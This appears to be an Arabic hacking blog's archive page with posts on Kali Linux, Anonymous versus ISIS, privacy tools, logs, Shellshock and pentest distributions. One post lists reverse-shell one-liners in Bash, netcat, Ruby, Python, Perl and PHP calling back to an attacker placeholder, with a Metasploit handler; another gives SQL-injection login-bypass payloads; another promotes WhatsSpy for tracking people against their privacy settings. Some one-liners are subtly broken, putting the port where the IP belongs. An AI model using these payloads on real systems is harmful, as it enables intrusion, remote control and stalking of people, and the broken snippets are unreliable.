‏إظهار الرسائل ذات التسميات ما يتعلق بالإختراق. إظهار كافة الرسائل
‏إظهار الرسائل ذات التسميات ما يتعلق بالإختراق. إظهار كافة الرسائل

الخميس، 3 مارس 2016

تحميل كالي لينكس 2.0 تحديث 2016.1 على ميديا فاير


السلام عليكم ورحمة الله تعالى وبركاته .

مرحبا بكم أعزائي المتابعين عامة و المهتمين بمجال أمن المعلومات و إختبار الإختراق و اللينكس خاصة ، اليوم في هذا الموضوع البسيط جدا ، فقط لمن يرغب في تحميل توزيعة كالي لينكس 2.0 في أخر تحديث ، التحديث جاء تحت إسم 2016.1 وقد أصلح مجموعة من الأمور ومنها بطء الواجهات الرسومية وتعامل المعالجات معها ، وكذلك تم تحديث قواعد بيانات مجموعة من الأدوات ، المهم بدون أن أطيل عليكم أترك لكم التجربة ، وبالتوفيق للجميع ، وتذكرو الرابط على ميديا فاير ويعني أن التحميل سيكون سهل وسريع بإذن الله .

التحميل من هنا 

MBARK TiЭSTO Blog

الخميس، 26 نوفمبر 2015

كيف تلاحق أنونيموس داعش وأساس الصراع وماهي الحقيقة


السلام عليكم ورحمة الله تعالى وبركاته.

هذا الفيديو ، هو نتيجة لمجموعة من التحقيقات الجنائية بالتعاون مع شركة أمن معلومات من دولة الكويت ، ومن خلال هذا الفيديو حاولت أن أغطي أهم الأشياء التي من الواجب أن تعلموها حول الصراع بين تنظيم داعش و بين مجموعة أنونيموس وإستخبارات بعض الدول ، وكذلك تذخل بعض المجموعات الأخرى ، وكذلك وفي الأخر لابد من أنك ستخرج بإستنتاج هام ، وهو أن مجموعة أنونيموس لم تعد تلك المنظمة التي نعرف ، فقد إختلط بدمها ، غدر الكلاب و أعمالهم المسيئة لكثيرين لا يخدمون مصلحتهم ، و كذلك ما نسيت أن أوضحه في الفيديو ، هو أن تنظيم الدولة الإسلامية "داعش" يملك قدرات هائلة في مجال الحرب الإلكترونية ، حيث يملك أجهزة رفع شدة الموجات الراديوية لطبقة الستراتموسفير وذلك للتشويش على أجهزة المجموعات التي تهاجمهم ، هذا في حالة إن كشفو مكانهم ، ويوجد الكثير من الأسرار منها ما نعلمه ومنها ما لانعلمه ، ولكن الله عز وجل هو السميع العليم ونحن الجهلاء . إذن بدون أن أطيل عليكم أدعكم مع الفيديو الذي أيمنى أن ينال إعجابكم .




الروابط


موقع مجموعة GhostSec

لرؤية التواصل الحي بين أعضاء الأنونيموس من هنا  للتذكير وجب عليك وضع إسم وهمي قبل الذخول وقبل كل هذا تأكد من إتخاذك جميع تذابير السلامة من تغيير الأيبي و إستخذام حواسيب في مقاهي النت ... ، لأنك تتعامل مع أناس أخطر من داعش ولسمح الله قد يورطوك في جريمة لم تفعلها هذا ناهيك عن إختراقهم لجهازك ويختلف أهمية هذا الأمر من شخص لأخر .

دليل المبتدئ : يهدف الى تقديم معلومات لكل من يريد اختراق المواقع والسيرفرات وكيفية التشفير والتخفي في الانترنت، تجده هنا.

دليل التبليغ: وهو دليل لكيفية استعمال سكربتات وبرامج آلية مخصصة للتبليغ التلقائي لحسابات ISIS على موقع تويتر. تجده هنا.

دليل البحث وجمع المعلومات: وهو دليل لتعليم المتطوعين طريقة جمع اي معلومات خاصة بالارهابيين في الانترنت سواء مواقع او حسابات او غيرها، وتجده هنا.

موقع GetTwitterID من هنا

سكربت TwitterReporter من هنا

موقع ReportOnlineTerrorism من هنا

جوجل العراق من هنا


MBARK TiЭSTO Blog

الجمعة، 17 أبريل 2015

برامج وتطبيقات وخدمات لم تستطع NSA إختراقها أو التجسس عليها أو فك تشفيرها ( أنصحك بإستخدامها )



السلام عليكم ورحمة الله

في هذا الدرس و الفيديو و  المقال سنركز عى أهم التطبيقات والبرتوكولات التي صنفتها وكالة الأمن القومي NSA بأنها “صعبة وعصية” على الكسر حتى الآن، ورغم أن وكالة الأمن القومي ذات باع طويل في مجال التشفير وكسر الشيفرات ويقبع في داخل أسوارها، علماء ومتخصصين في التشفير والرياضيات والفيزياء لا مثيل لهم في العالم وتملك كافة المصادر والأموال والوقت لتفعل ما تشاء ، إلا أن بعض البرامج مفتوحة المصدر والتي قام بتطويرها مطورين بالكاد يجدون الدعم أو شركات ناشئة بالكاد تُعرف أسماءها، وأشخاص أمكانياتهم محدودة، قامو بجعل مهمة جواسيس وعلماء وكالة الأمن القومي NSA أصعب وأعقد وشبه مستحيلة.

إذن بدون أن أطيل عليكم أدعكم مع الفيديو الذي أتمنى أن ينال إعجابكم .

عزيزي الزائر إذا أعجبك الشرح فلا تبخل علي بلايك للفيديو وأن تشترك معي .




روابط الخدمات والتطبيقات والبرامج التي تمت الإشارة لها في الفيديو.

تطبيق TorBrowser من هنا

 تطبيق TrueCrypt من هنا

تطبيق RedPhone للآندرويد من هنا

تطبيق Signal للآيفون من هنا

تطبيق LinPhone 
نسخة الوندوز من هنا، والماك من هنا، ولأنظمة لينكس من هنا، وللآندرويد من هنا، وللآيفون من هنا، ولهواتف وندوز من هنا

تطبيق Zemana AntiLogger من هنا

خدمة البريد الروسية الشهيرة Mailru من هنا

خدمة البريد الهندية الشهيرة Zoho من هنا

خدمة البريد الألمانية WebDe من هنا

نظام التشفير Tails  من هنا

خدمة التشفير SecurityKiss   من هنا

 خدمة Joinme الخاصة بعقد الإجتماعات عبر الإنترنت  من هنا

الخميس، 12 فبراير 2015

تطبيق يتيح التجسس على الآخرين عبر الاستفادة من ثغرات “واتساب”



السلام عليكم و رحمة الله .


نشر مطوّر يُدعى Maikel Zweerink تطبيقًا أطلق عليه اسم WhatsSpy يهدف إلى إظهار ضعف تطبيق “واتساب” في حماية خصوصية مُستخدميه. حيث يُتيح التطبيق الجديد تتبّع الآخرين بغض النظر عن إعدادات الخصوصية التي قاموا بضبطها.
WhatsSpy هو تطبيق ويب تم تطويره بتقنية PHP يُمكن تثبيته على جهاز الكمبيوتر أو المُخدّم الخاص بالمستخدم وفقًا للتعليمات التي شرحها المطوّر، ومهمته تقديم سجل كامل من المعلومات حول الأشخاص الذين يرغب المُستخدم بمراقبتهم.
ويتيح التطبيق مراقبة أشياء مثل حالة الاتصال للمستخدمين، حتى لو كانت إعدادات الخصوصية لديهم لا تتيح عرض آخر ظهور للآخرين. كما يتيح مُشاهدة الصور الشخصية مع سجل كامل لها في حال تغييرها، ويتيح حتى معرفة ماهي إعدادات الخصوصية المضبوطة في أجهزتهم بالنسبة للصورة الشخصية وحالة الظهور، وأخيرًا يُقدم التطبيق سجلًا برسائل الحالة الخاصة بمن يقوم المُستخدم بمُتابعتهم.
ويوفر التطبيق سجلًا مُحدثًا لحظة بلحظة يتم فيه عرض كافة المعلومات المتعلقة بالمُستخدمين الذي تتم متابعتهم مثل أوقات دخولهم وخروجهم وصورهم الشخصية الحالية أو بعد تبديلها وكذلك سجلًا برسائل الحالة الخاصة بهم.
يُذكر أن واتساب يواجه انتقادات دائمة بضعفه من الناحية الأمنية، إلا أن الشركة قامت بتحسينه مؤخرًا عبر دعم أحد أساليب التشفير القوية التي تمنع تسرّب رسائل المحادثات وهو ما كان ممكنًا في السابق.
لتحميل التطبيق من هنا

ملاحظة مهمة 
قبل عمل أي شيئ يجب أولا 
**بالنسبة للأندرويد يجب عمل روت وقد تطرقت بالتفصيل لهذا الموضوع وكيفية عمله من هنا
**بالنسبة للأجهزة الأيفون أو التي تعمل عموما بنظام IOS فيجب عمل جيليبريك وقد تطرقت لهذا في عدة مواضيع و هذا أفضلها من هنا

الخميس، 20 نوفمبر 2014

انشاء اتصال عكسي من سطر واحد وبعدة لغات


السلام عليكم و رحمة الله .


هذه معاني المتغيرات التي ستجدها في الشرح. استبدلها عند التطبيق.
$ATTCKER_IP: هو عنواد المهاجم
$ATTACKER_PORT: هو المنفذ الذي ينصت عليه الضحية
$VICTIM_IP: هو عنواد المهاجم
$VICTIM_PORT: هو المنفذ الذي ينصت عليه الضحية

Listining

تستطيع الإنصات بأي طريقة تحبها
- NetCat
1
nc -lvp $ATTACKER_PORT
أو
1
ncat -lvp $ATTACKER_PORT
- Metasploit
1
./msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=$ATTCKER_IP LPORT=$ATTACKER_PORT E
1
2
3
4
5
6
7
8
PAYLOAD => windows/shell/reverse_tcp
LHOST => $ATTCKER_IP
LPORT => $ATTCKER_PORT
[*] Started reverse handler on $ATTCKER_IP:$ATTCKER_PORT
[*] Starting the payload handler...
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to $VICTIM_IP
[*] Command shell session 1 opened ($ATTCKER_IP:$ATTCKER_PORT -> $VICTIM_IP:47657) 

Reverse connection

Bash
1
bash -i >& /dev/tcp/$ATTCKER_IP/$ATTCKER_PORT 0>&1

NetCat
1
nc -nvv $ATTCKER_IP $ATTCKER_PORT -e /bin/bash
أو
1
nc -c /bin/sh $ATTCKER_IP $ATTCKER_PORT

Ruby
1
ruby -r socket -e ' f=TCPSocket.open("$ATTCKER_IP",$ATTCKER_PORT).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Python
1
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("$ATTCKER_PORT",$ATTCKER_PORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Perl
1
perl -e 'use Socket;$i="$ATTCKER_PORT";$p=$ATTCKER_PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))) {open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'

Php
1
php -r '$sock=fsockopen("$ATTACKER_IP",$ATTACKER_PORT);exec("/bin/sh -i <&3 >&3 2>&3");'



مقدمة عن الـ Logs وأهميتها


السلام عليكم و رحمة الله .

سابقاً بعض الشركات والمصانع الكبيرة تجد هناك شخص يقف على باب الدخول وبيده ورقة وقلم، ويقوم بتسجيل دخول الموظفين الى الشركة أو المصنع وبأي وقت، وحين يغادر الموظف العمل يقوم بتسجيل ساعة الخروج. كل هذا لأجل إعلام اصحاب العمل بإنضباط الموظف في أوقات العمل، ومتى دخل الى الشركة ومتى غادرها. وبالإضافة الى ذلك تساعد هذه الورقة بشكل كبير في حالة حصول مشكلة معينة في وقت من الأوقات، سواء أثناء الدوام أو خارج وقت الدوام. يعني لو أخذنا مثال بسيط: حصول سرقة في الشركة بساعة 9:00 مساءاً. كون هذا الرجل الذي على الباب قام بتسجيل دخول كل شخص الى الشركة وبأية وقت. فذلك سوف يتيح للمعنيين من خلال مراجعة هذه الورقة من معرفة على الأقل من كان في المبنى في ذلك الوقت. صحيح لربما هذه الورقة لم تقم بحل المعادلة “من هو السارق؟”، لكنها سوف تساعد بشكل كبير على حصر المشكلة والذي هي أحد أساسيات إيجاد الحلول. كلما استطعنا تصغير المشكلة، سهل علينا حلها!
ملاحظة: طريقة التسجيل هذه قديمة للغاية، وأغلب الشركات اليوم أصبحت تستخدم أجهزة ألكترونية مرتبطة بالمداخل تقوم بتسجيل دخول الموظفين وخروجهم إما بواسطة بطاقات أو البصمة الى غيرها من التقنيات الحديثة.
الآن، أعلم ما يخطر في خاطرك: ما علاقة هذا بعنوان الموضوع؟
الجواب بسيط للغاية: الورقة التي سجل عليها الرجل الذي على الباب هو السجل أو ما يطلق عليه بأسم Log … هل تفكرت الآن الى أي درجة هذه الورقة البسيطة للغاية مفيدة؟ نحن تكلمنا عن مشكلة واحدة فقط، وهي حصول سرقة. هناك مشاكل أخرى عديدة يمكن أن تحصل داخل الشركات والمصانع. تلك الورقة البسيطة التي يكتب عليها ذلك الرجل نستطيع أن نستفيد منها بشكل كبير للغاية. تخييل نستطيع معرفة معدل وصول الموظفين اليومي، وبأي ساعة يعتاد الموظف الفلاني على الوصول والخروج. يعني الورقة البسيطة هذه يتعدى أهميتها فقط إكتشاف السرقة!
ما ذكرته بشكل بسيط للغاية هو بالضبط ما تستطيع الحصول عليه من خلال السجلات Logs التي بداخل الحواسيب، الخوادم، المعدات الخاصة بالشبكة، الأنظمة والبرمجيات. هناك بداخل جهازك الحاسوب سجلات Logs وهناك بداخل هاتفك الخلوي السجلات Logs وهناك بداخل نظام التشغيل الذي تستخدمه السجلات Logs وهناك مع العديد من البرمجيات التي تستعملها السجلات Logs! إذن لو تلاحظ معي بإن كل ما تستخدمه بشكل يومي له سجلات Logs، وحجم الفائدة التي تستطيع أن تحصل عليها منهم (Logs)، كبير جداً جداً.
هل تذكر الموظف الذي تم تسجيل إسمه عند دخوله الى الشركة؟ هذا ما يفعله حاسوبك عندما تقوم بتسجيل الدخول اليه (Login)، وأكيد سيعمل المثل عند خروجك منه (Logout). أيضاً الموظف الذي يقوم بالتسجيل، هو يقوم بتجهيز ورقة بشكل يومي عليها التاريخ لكي يستطيع أن يمييز إن هذه الورقة ليوم السبت أو الأحد وهكذا، هذا شيء مشابه لما يقوم به جهازك حين تقوم بتشغيله بذلك اليوم. حين يبدأ الجهاز بالعمل سوف يتم تسجيل إنه تم تشغيله في الساعة الفلانية وباليوم الفلاني. هل تلاحظ أي فائدة لهذه السجلات؟ لن أقف هنا، ساكمل مع أمثلة أخرى…
في العمل لديكم طابعة مشتركة من خلال الشبكة بين جميع الموظفين. بيوم من الأيام في العمل وجدت حبر الطابعة قد نفذ! لربما تتسائل، “طيب أنا قبل كم يوم أشتريت حبر جديد للطابعة”. إذا كانت الطابعة مليئة بالحبر وهي لا تطبع الآن بسبب نفاذ الحبر التي بداخلها، طيب مالذي حصل؟ هل تعلم بإن تلك السجلات البسيطة سوف تخبرك؟ نعم! ستجد تلك السجلات قد سجلت بإن المستخدم الفلاني في اليوم الفلاني في الساعة الفلانية قام بعملية طباعة. هل تعتقد هذا فقط؟ لا! سوف تخبرك كذلك بكم عدد الأوراق التي طبعها! يا سلام هل هناك شيء آخر أجمل من ذلك؟ تخييل لو عُدنا الى الزمن الذي لم تتواجد فيه هذه التكنلوجيا الرائعة، كنا سنضطر الى توظيف موظف خاص لمراقبة الطابعة (مثلاً)!!! هل ترى معي حجم الفائدة الآن؟ دعنا نرى مثال آخر، رغم إن الأمثلة عديدة للغاية ولن تنتهي لكن لنرى مثال آخر…
لو فرضنا إن المبنى الذي تعمل به له أكثر من مدخل، وكل مدخل عليه رجل يقوم بالتسجيل (كما وضحنا في البداية). في هذه الحالة بغض النظر من أين دخلت الى المبنى، سوف يتم تسجيل دخولك، ليس للمبنى فحسب وإنما تسجيل دخولك من أين جاء. نفس الشيء في الشبكة. تخييل لديكم بالعمل خادم تستخدمه للقيام ببعض الحسابات. هذا الخادم أحياناً تقوم بالدخول أليه من خلال الذهاب أليه بشكل مباشر وتسجل الدخول وثم تقوم بإجراء العمل المطلوب. وبعض الأحيان تكون أنت في المنزل مثلا أو خارج العمل ويتصل بك المدير ويطلب منك القيام بتلك العمليات الحسابية على الخادم، فالذي سوف تفعله هو الدخول الى الخادم ولكن عن بعد Remotely. الفرق بين الحالتين، هي بالأولى أنت دخلت الى الخادم من خلال تواجدك أمام الخادم نفسه، وفي الحالة الثانية أضطررت للدخول أليه من مكان آخر. كما في ذلك الرجل الذي على الباب، سجل دخولك من الباب الفلاني، الحاسوب سوف يعمل نفس الأمر. سوف يسجل بإنك في الحالة الأولى كنت قد سجلت الدخول من خلال التواصل مع الحاسوب بشكل مباشر، بينما في الحالة الثانية سوف يسجل إنك كنت قادم من الجهاز صاحب الـ IP Address الفلاني.

برنامج Sculptor الأقوى لحقن قواعد البيانات وبمميزات رائعة


السلام عليكم و رحمة الله .

برنامج Sculptor او ما يطلق عليه برنامج النحات باللغة العربية. يساعد البرنامج مختبري الاختراق في اكتشاف واستغلال الثغرات من نوع SQL Injection
ويجب التنبيه إلي ان البرنامج مجاني تماما وهو بديل رائع لبرنامج Havij الواسع الإنتشار في هذا المجال والذي يصل ثمنه الي 650 دولار أمريكي!


خصائص ومميزات برنامج النحات هي كالتالي:


1. يدعم الحقن في قواعد البيانات من نوع:

· MySQL

· SQL Server

·Microsoft Access



2. يدعم الأنواع التالية من الحقن:

Error Based + Union Injection

· Blind SQl Injection

3. خاصية : Auto Scanning الفحص التلقائي للموقع واختباره واكتشاف ما به من ثغرات ومن ثم  يمكنك استغلالها بنفس البرنامج أيضا.


4. خاصية  Authentication Bypass: اول برنامج يوجد به امكانية استغلال هذا النوع من الثغرات حيث تتيح لك هذه الخاصية تخطي لوحة دخول مدير الموقع من خلال تجريب عدة Payloads مثال علي هذه الثغرة or ‘1’=’a’– أو a’ or ‘a’=’a وغيرها.



5. خاصية Auto Detects : امكانية تحديد نوع الحقن وقاعدة البيانات بشكل تلقائي.

6. خاصية specific injections: يتيح لمختبر الاختراق بتحديد نوع الحقن وقاعدة البيانات.

7. البرنامج يدعم حقن المواقع التي تعمل ببروتوكول HTTPS وكما نعلم فإن النسخة المجانية من Havij ﻻ تدعم مثل هذه الخاصية.

8. يدعم البرنامج الحقن في GET and POST

9. خاصية HTTP Post Engine feature : امكانية استغلال ثغرات SQLI with POST Type بثلاثة طرق مختلفة مع واجهة بسيطة للمستخدم.

10. يتيح للمستخدم امكانية تنفيذ اوامر على قاعدة البيانات وعرض النتائج.




11. امكانية حفظ النتائج بامتداد XML Or HTML.
12. امكانية الحقن فى اكثر من قاعدة بيانات متاحه.
13. امكانية استخدام بروكسي للتخفي عند استخدام البرنامج.
14. امكانية البحث عن لوحة تحكم مدراء المواقع Admin page finder

15. البرنامج ذو واجهة رسومية جيدة وسهله للمستخدم وهذا ما يفرقه عن الأداة القوية SQL Map.

يمكنك تحميل البرنامج من موقعه الرسمي من هنا

يمكنكم مشاهدة بعض الفيديوهات التي تشرح بعض خصائص البرنامج من خلال الروابط التالية:
Sculptor – Sql Injection – Get All DataBases
Sculptor – Blind SQl Injection
http://www.youtube.com/watch?v=iQ7MKD8DpbA
Sculptor – Sql Authentication Bypass
http://www.youtube.com/watch?v=yBgfGakJ6Lo
Sculptor – Sql injection – Http Post Method

الجمعة، 17 أكتوبر 2014

اكتشاف ثغرة في أنظمة يونيكس أخطر من هارتبليد


إكتشف خبراء أمنيون حديثا ثغرة أمنية في جزء Bash الذي يستخدم للتحكم بـسطر الأوامر من نظام التشغيل لينوكس، قد تعرض أجهزة الحاسوب لتهديد أخطر من ثغرة هارتبليد حيث يمكن استغلال هذه الثغرة للسيطرة على النظام كاملا.

و في انذار وجهه فريق الاستعداد لطوارئ الحاسب الآلي في الولايات المتحدة US-CERT يقول فيه إن الثغرة تضر بجميع أنظمة التشغيل القائمة على نواة يونيكس ، بما في ذلك نظام لينوكس ونظام التشغيل Mac OS X

و قال مدير الهندسة لدى شركة أمن المعلومات Rapid7 تود بيردسلي أن الثغرة تم تصنيفها ضمن الدرجة العاشرة من حيث الشدة أي أن تأثيرها خطير ، ولكنها صنفت أيضا منخفض من حيث درجة تعقيد الاختراق، ما يعني أن شن الهجمات سهل نسبيا.

و بعد انشار الثغرة قامت بعض شركات تطوير أنظمة لينوكس مثل Red Hat بالتحضير لتحديث جديد من أجل ترقيع الثغرة.

الأحد، 6 يوليو 2014

أساسيات إختراق المواقع الحلقة 12 شرح إستغلال ثغرة نزيف القلب Heartbleed ( كالي لينكس Kali Linux)


السلام عليكم 

لعلك سمعت  في الأونة الأخيرة بنزيف القلب أو Heartbleed ، وهي الثغرة التي حيرت خبراء أمن المعلومات ولازال 213 ألف موقع مصاب بهذه الثغرة ، طبعا هي ثغرة من نوع خاص حتث أنه تصيب فقط السيرفرات ( المواقع ) التي تستخدم بروتوكول الحماية HTTPS، وتستهدف في هجومها الرام ، المهم بدون أن أطيل عليكم أدعكم مع هذا الشرح البسيط للثغرة وكيفية إستغلالها ، وأتمنى أن ينال إعجابكم .


عزيزي الزائر إذا أعجبك الشرح فلا تبخل علي بلايك للفيديو وأن تشترك معي 

لتحميل سكريبت الثغرة من تطويري من هنا 

الشرح 


الأربعاء، 11 يونيو 2014

Bein Sport تهدد قنوات Anonymous

السلام عليكم 
أول أمس نشرت مجموعة أنونيموس فيديو يخبر بأنه سيتم التشويش على قنوات بين سبورت الحقيرة ، شخصيا فرحت لذالك ، لكن أنونيموس تطلب مساعدة بسيطة من العرب لكي تتم عملية الإحباط في هذا الفيديو في الأسفل .

الاثنين، 26 مايو 2014

نظرة سطحية على نظام إختبار الإختراق الأقوى NodeZero


السلام عليكم 

كثرت هي أنظمة إختبار الإختراق المنافسة للباكتراك والكالي لينكس ، ويمكنك الإطلاع وإكتشاف 12 نظام كأفضل أنظمة إختبار الإختراق التي تغنيك عن الكالي لينكس والباكتراك  الموضوع من هنا.
وقد أعجبني أحد هذه الأنظمة الذي  لن تناقشني فيه وهو نظام NodeZero  بعد تجارب بسيطة قد أجريتها عليه أثبت لي فعلا بأنه يقضي على الباكتراك والكالي لينكس بحيث أنه يتوفر على أكثر من 400 أداة إختبار إختراق وحماية ، والجميل أيضا في النظام هو توفره على عدة أدواة لم تسمع بها من قبل ، إنه فعلا نظام يستحق أن تثبته على جهازك كنظام رئيسي وتحذف الويندوز لأنه يتوفر على كل ما تحتاج على اللينكس كل كل كل ما تحتاج من جافا ومشغلات الصوتيات ومحررات النصوص وبرامج المونتاج ومتصفحات أمنة وعلى ذكر التصفح فسوف تكتشف سرعة التصفح الهائلة في هذا النظام ، المهم دعونا نتابع هذا الشرح البسيط جدا عن هذا النظام ، خخخخخ أتمنى أن ينال صوتي القبيح إعجابكم .

عزيزي الزائر إذا أعجبك الشرح فلا تبخل علي بلايك للفيديو وأن تشترك معي 


لتحميل النظام من هنا

الشرح 

الاثنين، 12 مايو 2014

تعرف على أقوى توزيعات اختبار الاختراق والحماية



السلام عليكم

ما أكثرها الرسائل التي تصلني عن الطريقة أومشاكل تتبيث كالي لينكس, وكأنه لا يوجد غير نظام الكالي لينكس لاختبار الحماية أو الاختراق. ولهدا قررت اليوم أن أضع بين أيديكم أفضل 12 نظام تشغيل اخر يستعملها الهاكرز,الباحثون عن الثغرات, وكدالك خبراء اختبار والحماية.  وأنا متأكد أن أغلبكم يعرف فقط  توزيعة واحدة منها وهي kali linux, ودالك راجع لما يحظى به كالي لينكس من اهتمام وكدالك عدم مشاركة الأخرين لمعلومات مثل هاته.  ولكن قررت  في هدا الموضوع أن  أكسر هدا الصمت وأعرفكم على التوزيعات الأخرى والتي يستعملها أغلب خبراء الحماية ولا يعرفها أغلب الأشخاص العاديين.

في هده التدوينة حاولت أن أنقي أفضل وأشهر توزيعات اختبار الحماية ودالك لقوة الأدوات التي توفرها لخبراء اختبار الاختراق أو ما نسميهم Pentesters .
وكما نعرف فكل التوزيعات بها ايجابيات وسلبيات , فبعض هده التوزيعات قوية في اختبار المواقع لكنها ضعيفة في اختبار الشبكات والعكس, وسنضع الأقوى بين أيديكم ويمكنكم الاختيار بينهم لبدأ مشوارك في اختبار الاختراق واكتشاف الثغرات.

 Kali Linux


التحميل من هنا                                                             

 NodeZero.



                         التحميل من هنا                                                                       

 BackBox Linux


                          التحميل من هنا                                                                                
 Blackbuntu.

التحميل من هنا                                                        


 Samurai Web Testing Framework.

التحميل من هنا                                                       


. Knoppix STD. 



التحميل من هنا                                                          

 Pentoo.

                     التحميل من هنا                                                                

 WEAKERTH4N.


   التحميل من هنا                                                           

Matriux Krypton.

   التحميل من هنا                                                                    
 DEFT.

   التحميل من هنا                                                            

 CAINE


   التحميل من هنا                                                                    

Bugtraq.


                                                                     التحميل من هنا